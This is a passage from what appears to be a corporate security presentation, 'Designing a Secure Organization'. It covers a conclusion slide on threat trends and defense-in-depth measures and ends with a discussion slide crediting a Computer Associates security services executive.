• Management         Multiple                     Single
• Accountability     Many                         One
• Integrated         Low                          High
• "Win" Factor       Low Visibility               High Visibility

Page 81: Designing a Secure Organization

Conclusion

Preparing for risks brings tangible benefits in a hostile environment:

• Perimeter is disappearing, threats are 360 degrees

• Exploits and hacking tools are readily available

• Skills required to exploit threats are low and dropping

• Blended threats will become more sophisticated

Defense in depth across the entire network is key:

• Vulnerability management

• Firewalls and VPNs

• Antivirus

• Intrusion detection

• Support and alerting services

• ID Management

• Forensics Tools

Implement a process to manage policy and incidents

Top management support and awareness training are key

Page 82: Designing a Secure Organization

Discussion

Michael Coady

Computer Associates Intl.

Vice President, North America

Security Services